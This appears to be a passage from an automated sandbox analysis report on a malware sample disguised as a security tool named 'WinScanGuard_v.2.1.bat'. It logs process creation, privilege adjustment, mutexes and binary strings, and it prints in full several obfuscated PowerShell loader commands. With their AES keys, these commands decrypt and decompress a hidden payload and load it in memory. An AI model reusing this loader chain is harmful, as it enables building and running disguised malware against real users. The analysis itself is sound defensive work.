'')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdZH4kVSXjz0XVe4ZYpD+he6+N8ebMZVScb8HKUN/+DzmXUfDtfwWV5MarCY6ZdmO2yJ4s2sbOzZsPvxKUwPa7yfFsYHuzQ4rPk9Yysf5MqW
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{d814285b-904f-4c3a-8cab-4579f96b72d9}
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{f835588e-a1ef-4d6b-bc1e-b44ddb22d787}
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\$sxr-powershell.exe "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5088).WaitForExit();[System.Threading.Thread]::Sleep(5000); function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXd
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ee0091e4-9e0c-4ff3-b26f-57d4a238bd7c}
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{f5381469-1700-4694-82dd-1722ad94b3e0}
              Source: C:\Windows\System32\winlogon.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{f78b27af-93da-4459-95e7-4c5d26a44dc8}
              Source: C:\Windows\System32\winlogon.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{85d85a52-fed6-47b1-b615-c3a69ff1ad14}
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{8c0bd129-911b-4af2-a0bc-93995d45cd5f}
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{0979c3ff-3e63-4ea9-9d2b-0e24c33cbca9}
              Source: C:\Windows\System32\winlogon.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{59453cd9-80c7-4c7f-84ca-38ec20f032b9}
              Source: C:\Windows\System32\winlogon.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8b9e4941-156b-4561-b75c-88dc752d3d8b}
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{da1a065e-b06d-4c17-9fd5-69413fe213f9}
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{2c62f067-a6a0-49cc-8f1a-bf6b18a4e5be}
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe "WinScanGuard_v.2.1.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function oLSgt($QHQwZ){ $FhDgh=[System.Security.Cryptography.Aes]::Create(); $FhDgh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FhDgh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FhDgh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ONJSi5FjJzv4AOEMBvugvr4ituUVmgVNRnjeJyrP0WQ='); $FhDgh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CLQNYwl0vsdfD4X+5YKrxQ=='); $SpFlB=$FhDgh.CreateDecryptor(); $return_var=$SpFlB.TransformFinalBlock($QHQwZ, 0, $QHQwZ.Length); $SpFlB.Dispose(); $FhDgh.Dispose(); $return_var;}function rnHmS($QHQwZ){ $WxVgK=New-Object System.IO.MemoryStream(,$QHQwZ); $bpCBe=New-Object System.IO.MemoryStream; $coUVU=New-Object System.IO.Compression.GZipStream($WxVgK, [IO.Compression.CompressionMode]::Decompress); $coUVU.CopyTo($bpCBe); $coUVU.Dispose(); $WxVgK.Dispose(); $bpCBe.Dispose(); $bpCBe.ToArray();}function ZAtIe($QHQwZ,$cjUqy){ $oSPmD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$QHQwZ); $xWTDt=$oSPmD.EntryPoint; $xWTDt.Invoke($null, $cjUqy);}$YlWDR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\WinScanGuard_v.2.1.bat').Split([Environment]::NewLine);foreach ($XUIQg in $YlWDR) { if ($XUIQg.StartsWith('SEROXEN')) { $sOgSv=$XUIQg.Substring(7); break; }}$ZErMU=[string[]]$sOgSv.Split('\');$tzgBc=rnHmS (oLSgt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZErMU[0])));$TtDxt=rnHmS (oLSgt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZErMU[1])));ZAtIe $TtDxt (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));ZAtIe $tzgBc (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{17980c38-011a-4e2a-a8da-a3b9e80db269}Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{6ee5d1df-df32-414a-8053-43a03a04def5}Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{b60ad232-6d40-4822-9220-52a4d3050cb3}Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{603825cb-58d6-4ab4-99a0-2fdb5cd309d6}Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\$sxr-mshta.exeProcess created: C:\Windows\$sxr-cmd.exe "C:\Windows\$sxr-cmd.exe" /c %$sxr-bWTLJBKbogHiYUerhoAr4312:&#<?=%Jump to behavior
              Source: C:\Windows\$sxr-cmd.exeProcess created: C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdZH4kVSXjz0XVe4ZYpD+he6+N8ebMZVScb8HKUN/+DzmXUfDtfwWV5MarCY6ZdmO2yJ4s2sbOzZsPvxKUwPa7yfFsYHuzQ4rPk9Yysf5MqWJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{d814285b-904f-4c3a-8cab-4579f96b72d9}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{f835588e-a1ef-4d6b-bc1e-b44ddb22d787}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\$sxr-powershell.exe "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5088).WaitForExit();[System.Threading.Thread]::Sleep(5000); function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ee0091e4-9e0c-4ff3-b26f-57d4a238bd7c}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{f5381469-1700-4694-82dd-1722ad94b3e0}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{f78b27af-93da-4459-95e7-4c5d26a44dc8}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{85d85a52-fed6-47b1-b615-c3a69ff1ad14}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{8c0bd129-911b-4af2-a0bc-93995d45cd5f}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{0979c3ff-3e63-4ea9-9d2b-0e24c33cbca9}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{59453cd9-80c7-4c7f-84ca-38ec20f032b9}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8b9e4941-156b-4561-b75c-88dc752d3d8b}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{da1a065e-b06d-4c17-9fd5-69413fe213f9}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{2c62f067-a6a0-49cc-8f1a-bf6b18a4e5be}Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_0000000140001014 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindCloseChangeNotification,RegOpenKeyExW,RegDeleteValueW,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,RtlDeleteBoundaryDescriptor,HeapAlloc,GetProcessHeap,HeapFree,RtlDeleteBoundaryDescriptor,6_2_0000000140001014
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 7_2_0040133E GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,7_2_0040133E
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 15_2_0040133E GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,15_2_0040133E
              Source: C:\Windows\System32\dllhost.exeCode function: 22_2_0000000140001B30 LookupPrivilegeValueW,AdjustTokenPrivileges,FindCloseChangeNotification,FindResourceA,RegCreateKeyExW,RegSetKeySecurity,RegCreateKeyExW,RegSetValueExW,RegCloseKey,CreateThread,CreateThread,SleepEx,22_2_0000000140001B30
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_00401B33 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,23_2_00401B33
              Source: C:\Windows\$sxr-powershell.exeWMI Queries: IWbemServices::ExecNotificationQuery - root\cimv2 : select * from Win32_ProcessStartTrace
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gnhdjmxp.ad2.ps1Jump to behavior
              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_0000000140001014 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindCloseChangeNotification,RegOpenKeyExW,RegDeleteValueW,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,RtlDeleteBoundaryDescriptor,HeapAlloc,GetProcessHeap,HeapFree,RtlDeleteBoundaryDescriptor,6_2_0000000140001014
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF61551FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,16_2_00007FF61551FB54
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\$sxr-powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\$sxr-powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6800:120:WilError_03
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7132
              Source: C:\Windows\$sxr-powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
              Source: C:\Windows\$sxr-powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Local\b7db7e25-c958-4026-9103-c339a6fa4d6d
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:792:120:WilError_03
              Source: C:\Windows\$sxr-mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: WinScanGuard_v.2.1.batStatic file information: File size 13030371 > 1048576
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.sharpdx.dxgi.pdb.compressed|||SharpDX.DXGI.pdb|D73E59804E3EE494A4612185771F7F67B2FD64AE|34752 source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.sharpdx.direct3d11.pdb.compressed source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: mshta.pdbGCTL source: $sxr-mshta.exe, 0000000D.00000000.1920454183.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmp, $sxr-mshta.exe, 0000000D.00000002.2918096738.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmp, $sxr-mshta.exe.2.dr
              Source: Binary string: costura.costura.pdb.compressed source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C8051D000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000012.00000002.2928056042.0000028528D41000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.sharpdx.pdb.compressed|||SharpDX.pdb|1A7C10AA582CCEEBFFD9BC77A11353AAAE6417E9|42824 source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: #costura.sharpdx.dxgi.pdb.compressed source: $sxr-powershell.exe, 00000012.00000002.2928056042.0000028528D41000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.sharpdx.pdb.compressed source: $sxr-powershell.exe, 00000012.00000002.2928056042.0000028528D41000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
